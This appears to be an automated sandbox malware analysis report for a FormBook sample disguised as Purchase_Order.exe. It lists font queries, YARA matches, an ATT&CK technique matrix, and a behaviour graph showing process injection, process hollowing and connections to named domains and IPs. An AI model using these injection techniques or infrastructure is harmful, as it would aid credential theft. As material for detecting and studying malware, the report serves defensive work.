            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

            Stealing of Sensitive Information:

            barindex
            Yara detected FormBookShow sources
            Source: Yara matchFile source: 00000000.00000002.259944230.0000000003AD1000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.320741403.0000000001210000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000010.00000002.504805498.0000000004D80000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000010.00000002.501363256.00000000010C0000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000010.00000002.505034491.0000000004DB0000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.321348253.0000000001580000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000000.257791048.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.320281190.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 4.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.0.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.0.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE

            Remote Access Functionality:

            barindex
            Yara detected FormBookShow sources
            Source: Yara matchFile source: 00000000.00000002.259944230.0000000003AD1000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.320741403.0000000001210000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000010.00000002.504805498.0000000004D80000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000010.00000002.501363256.00000000010C0000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000010.00000002.505034491.0000000004DB0000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.321348253.0000000001580000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000000.257791048.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.320281190.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 4.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.0.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.0.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE

            Mitre Att&ck Matrix

            Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
            Valid AccountsShared Modules1Path InterceptionProcess Injection712Masquerading1OS Credential DumpingSecurity Software Discovery221Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
            Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsDisable or Modify Tools1LSASS MemoryProcess Discovery2Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothIngress Tool Transfer3Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
            Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Virtualization/Sandbox Evasion31Security Account ManagerVirtualization/Sandbox Evasion31SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
            Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection712NTDSApplication Window Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol13SIM Card SwapCarrier Billing Fraud
            Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptDeobfuscate/Decode Files or Information1LSA SecretsRemote System Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
            Replication Through Removable MediaLaunchdRc.commonRc.commonObfuscated Files or Information4Cached Domain CredentialsSystem Information Discovery112VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
            External Remote ServicesScheduled TaskStartup ItemsStartup ItemsSoftware Packing2DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 433266 Sample: Purchase_Order.exe Startdate: 11/06/2021 Architecture: WINDOWS Score: 100 31 www.homeanddesignstudio.com 2->31 33 td-balancer-euw2-6-109.wixdns.net 2->33 35 4 other IPs or domains 2->35 43 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->43 45 Found malware configuration 2->45 47 Malicious sample detected (through community Yara rule) 2->47 49 7 other signatures 2->49 11 Purchase_Order.exe 3 2->11         started        signatures3 process4 file5 29 C:\Users\user\...\Purchase_Order.exe.log, ASCII 11->29 dropped 59 Writes to foreign memory regions 11->59 61 Injects a PE file into a foreign processes 11->61 15 RegSvcs.exe 11->15         started        signatures6 process7 signatures8 63 Modifies the context of a thread in another process (thread injection) 15->63 65 Maps a DLL or memory area into another process 15->65 67 Sample uses process hollowing technique 15->67 69 2 other signatures 15->69 18 explorer.exe 15->18 injected process9 dnsIp10 37 www.cgjanvier.com 156.241.53.127, 49737, 80 XIAOZHIYUN1-AS-APICIDCNETWORKUS Seychelles 18->37 39 mexicobeachselfstorage.com 162.241.253.69, 49730, 80 UNIFIEDLAYER-AS-1US United States 18->39 41 14 other IPs or domains 18->41 51 System process connects to network (likely due to code injection or exploit) 18->51 22 systray.exe 18->22         started        signatures11 process12 signatures13 53 Modifies the context of a thread in another process (thread injection) 22->53 55 Maps a DLL or memory area into another process 22->55 57 Tries to detect virtualization through RDTSC time measurements 22->57 25 cmd.exe 1 22->25         started        process14 process15 27 conhost.exe 25->27         started       

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.

            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            Purchase_Order.exe21%VirustotalBrowse
            Purchase_Order.exe15%ReversingLabsWin32.Trojan.Wacatac

            Dropped Files

            No Antivirus matches

            Unpacked PE Files

            SourceDetectionScannerLabelLinkDownload
            4.2.RegSvcs.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
